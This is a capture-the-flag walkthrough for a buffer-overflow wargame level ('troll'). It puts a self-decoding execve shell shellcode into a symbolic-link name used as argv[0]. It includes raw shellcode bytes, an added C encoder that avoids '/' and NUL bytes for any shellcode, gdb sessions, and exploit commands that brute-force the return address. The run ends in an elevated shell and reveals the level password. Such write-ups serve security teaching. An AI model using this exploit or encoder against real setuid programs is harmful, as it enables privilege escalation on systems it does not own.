This level adds one thing to the previous one: a check that the argument count is exactly 2.
So the argv[2] trick from before is gone.
What we still have to work with:
1. Overwriting the SFP
2. Overwriting the RET
3. argv[1], at most 48 bytes -> but 40 bytes of it get zeroed out.
4. argv[0] -> the file name.
So let's attack through argv[0].
Create a symbolic link to troll whose name is the shellcode, run the binary through that link so the link name becomes argv[0], and point RET at argv[0]. exec follows the link, so it is still the setuid troll binary that runs; this should succeed.
There is one problem: the shellcode cannot contain a 0x2f byte. 0x2f is '/', and since a file name cannot contain a path separator the link cannot be created with such a name (0x00 is ruled out for the same reason: it terminates the name). So we need shellcode free of 0x2f; the one below works. It is a self-decoding shellcode: a 24-byte stub that subtracts 1 from each byte that follows it, wrapped around the standard 24-byte execve("/bin//sh") shellcode, whose '/' bytes are stored as 0x30.
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
출처: <http://iyounges.org/m/post/view/id/556>
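As an added example, not part of the original writeup and not code from the shellcode's source: the C program below rebuilds the shellcode above from its parts and turns the "no 0x2f" rule into a reusable check. The decoder stub is the first 24 bytes of the shellcode above, with the CL count byte patched to the real body length (the original uses 0x32, so it decodes 50 bytes and harmlessly runs past the 24-byte body). The raw body is the standard execve("/bin//sh") shellcode the encoded bytes decode to. Function names, the forbidden-byte list and the sample inputs are my own choices; the forbidden set is what a file name can never hold, 0x00 and 0x2f. The encoder also refuses the cases the simple "+1" scheme cannot handle: a 0x2e byte would encode to 0x2f, 0xff would wrap to 0x00, and a 47-byte body would put 0x2f into the count byte itself.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Self-decoding stub taken apart from the page's shellcode.  The jmp/call
 * pair leaves the address of the encoded body in esi; the loop then
 * subtracts 1 from each of CL bytes, last byte first, and falls through
 * into the decoded body.  Offset 6 is the CL immediate (the page used 0x32). */
static const uint8_t DECODER[] = {
    0xeb, 0x11,                   /* jmp  short get_body                  */
    0x5e,                         /* pop  esi            ; body address   */
    0x31, 0xc9,                   /* xor  ecx, ecx                        */
    0xb1, 0x00,                   /* mov  cl, LEN        ; patched below  */
    0x80, 0x6c, 0x0e, 0xff, 0x01, /* sub  byte [esi+ecx-1], 1             */
    0x80, 0xe9, 0x01,             /* sub  cl, 1                           */
    0x75, 0xf6,                   /* jnz  back to the sub                 */
    0xeb, 0x05,                   /* jmp  short body                      */
    0xe8, 0xea, 0xff, 0xff, 0xff, /* get_body: call back to the pop esi   */
};
#define DECODER_CL_OFFSET 6

/* Standard 24-byte Linux/x86 execve("/bin//sh") shellcode; this is what the
 * page's encoded body decodes to.  It contains 0x2f ('/') four times. */
static const uint8_t EXECVE_SH[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0x99, 0xb0, 0x0b, 0xcd, 0x80,
};

/* Bytes a file name can never hold: NUL terminates it, '/' splits it. */
static const uint8_t FILENAME_BAD[] = { 0x00, 0x2f };

/* Return 1 if buf contains any byte listed in bad[], else 0. */
int has_bad_byte(const uint8_t *buf, size_t n, const uint8_t *bad, size_t nbad)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return 1;
    return 0;
}

/* Inverse of the stub's loop: add 1 (mod 256) to every byte. */
void encode_add1(const uint8_t *in, size_t n, uint8_t *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(in[i] + 1);
}

/* What the stub does at run time, kept here to verify the round trip. */
void decode_sub1(const uint8_t *in, size_t n, uint8_t *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(in[i] - 1);
}

/* Emit stub + encoded body into out.  Returns the total length, or -1 when
 * the body does not fit in CL, out is too small, or a bad byte survives
 * anywhere in the result (stub, count byte or encoded body). */
int build_encoded_shellcode(const uint8_t *raw, size_t n, uint8_t *out, size_t outcap,
                            const uint8_t *bad, size_t nbad)
{
    size_t total = sizeof DECODER + n;
    if (n == 0 || n > 0xff || total > outcap)
        return -1;
    memcpy(out, DECODER, sizeof DECODER);
    out[DECODER_CL_OFFSET] = (uint8_t)n;      /* exact body length, not 0x32 */
    encode_add1(raw, n, out + sizeof DECODER);
    if (has_bad_byte(out, total, bad, nbad))   /* e.g. 0x2e -> 0x2f, 0xff -> 0x00 */
        return -1;
    return (int)total;
}

/* Print in the perl -e 'print "..."' form used on the ln -s line. */
void print_perl_string(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", buf[i]);
    putchar('\n');
}

int main(void)
{
    uint8_t payload[256];
    int len = build_encoded_shellcode(EXECVE_SH, sizeof EXECVE_SH, payload, sizeof payload,
                                      FILENAME_BAD, sizeof FILENAME_BAD);
    if (len < 0) {
        fputs("encoding left a forbidden byte in the payload\n", stderr);
        return 1;
    }
    printf("raw body has '/': %d; encoded payload has '/' or NUL: %d; length %d\n",
           has_bad_byte(EXECVE_SH, sizeof EXECVE_SH, FILENAME_BAD, sizeof FILENAME_BAD),
           has_bad_byte(payload, (size_t)len, FILENAME_BAD, sizeof FILENAME_BAD), len);
    print_perl_string(payload, (size_t)len);
    return 0;
}
```

Build with `gcc -o encode encode.c` on any machine; the last line it prints is the string to put into the `perl -e` of the `ln -s` command (with the count byte 0x18 instead of the page's 0x32). Any other 32-bit Linux shellcode can be passed to `build_encoded_shellcode` the same way, and a return of -1 means that body needs a different encoding than a plain +1.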
Attack!
[orge@localhost orge]$ bash2   // switch to bash2, which passes the \xff bytes in the payload through unmangled
[orge@localhost orge]$ ln -s troll `perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`   // create the symbolic link to troll; its name is a 50-byte nop sled followed by the shellcode
[orge@localhost orge]$ ls
troll ???????????????????????????????????????????????????^12?l????u楕?凹2핽i00tii0cjo??T????   // the link name is raw bytes, so ls shows it as garbage
troll.c
[orge@localhost orge]$ gdb -q troll_1   // troll_1: a debugging copy of troll
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r `perl -e 'print "a"x47,"\xbf"'`
Starting program: /home/orge/troll_1 `perl -e 'print "a"x47,"\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Breakpoint 1, 0x804863d in main ()
(gdb) x/4x $ebp
0xbffffcb8: 0x61616161 0xbf616161 0x00000000 0xbffffd04   // SFP, RET (last byte 0xbf), and the argv pointer at 0xbffffd04
(gdb) x/x 0xbffffd04
0xbffffd04: 0xbffffdfc   // argv[0]
(gdb) x/s 0xbffffdfc
0xbffffdfc: "/home/orge/troll_1"   // rough location of argv[0]
(gdb) quit
The address found under gdb (0xbffffdfc) belongs to the short name /home/orge/troll_1; in the real run argv[0] is the 100-byte link name ("./" plus the 98-byte nop sled and shellcode) and the environment differs as well, so argv[0] starts lower on the stack. The payload puts RET at offset 44, after the 40-byte buffer and the 4-byte SFP, so that the high byte 0xbf lands at argv[1][47] as in the gdb run, and the address is walked down in 0x10 steps until it hits the nop sled.
[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "x"x44,"\xfc\xfd\xff\xbf"'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx   // the 4 raw bytes of RET print as garbage after the 44 x's
Segmentation fault
// Same command with RET lowered by 0x10 each time: 0xbffffdec, 0xbffffddc, 0xbffffdcc, 0xbffffdbc, 0xbffffdac, 0xbffffd9c, 0xbffffd8c, 0xbffffd7c, 0xbffffd6c, 0xbffffd5c, 0xbffffd4c, 0xbffffd3c, 0xbffffd2c -> Segmentation fault every time.
[orge@localhost orge]$ ./`perl -e 'print "\x90"x50,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "x"x44,"\x1c\xfd\xff\xbf"'`
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin
// This attack took several tries, because the location of argv[0] is hard to pin down exactly.